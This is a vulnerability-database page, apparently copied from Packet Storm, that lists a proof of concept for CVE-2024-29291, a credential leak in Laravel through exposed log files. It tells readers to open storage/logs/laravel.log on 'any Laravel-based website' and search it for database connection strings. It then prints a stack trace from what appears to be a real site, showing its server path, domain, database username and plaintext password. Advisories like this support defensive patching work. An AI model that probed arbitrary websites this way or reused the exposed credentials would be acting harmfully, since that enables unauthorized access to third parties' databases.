Lucene search
K

Laravel Framework 11 Credential Disclosure

🗓️ 22 Apr 2024 00:00:00Reported by Huseein AmerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 325 Views

Laravel Framework 11 - Credential Leakage CVE-2024-29291 Proof of concept: Navigate to storage/logs/laravel.log and search for "PDO->__construct('mysql:host=

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Laravel Framework 11 - Credential Leakage Vulnerability
21 Apr 202400:00
zdt
CNNVD
Laravel Framework 安全漏洞
16 Apr 202400:00
cnnvd
CVE
CVE-2024-29291
16 Apr 202400:00
cve
Cvelist
CVE-2024-29291
16 Apr 202400:00
cvelist
Exploit DB
Laravel Framework 11 - Credential Leakage
21 Apr 202400:00
exploitdb
NVD
CVE-2024-29291
16 Apr 202423:15
nvd
RedhatCVE
CVE-2024-29291
23 May 202510:19
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-29291
27 Feb 202500:00
vulncheck_kev
Vulnrichment
CVE-2024-29291
16 Apr 202400:00
vulnrichment
`# Exploit Title: Laravel Framework 11 - Credential Leakage  
# Google Dork: N/A  
# Date: [2024-04-19]  
# Exploit Author: Huseein Amer  
# Vendor Homepage: [https://laravel.com/]  
# Software Link: N/A  
# Version: 8.* - 11.* (REQUIRED)  
# Tested on: [N/A]  
# CVE : CVE-2024-29291  
  
Proof of concept:  
Go to any Laravel-based website and navigate to storage/logs/laravel.log.  
  
Open the file and search for "PDO->__construct('mysql:host=".  
The result:  
shell  
Copy code  
#0  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):  
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',  
Array)  
#1  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):  
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',  
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)  
Credentials:  
Username: u429384055_jscv  
Password: Jaly$$a0p0p0p0  
Host: sql1...  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation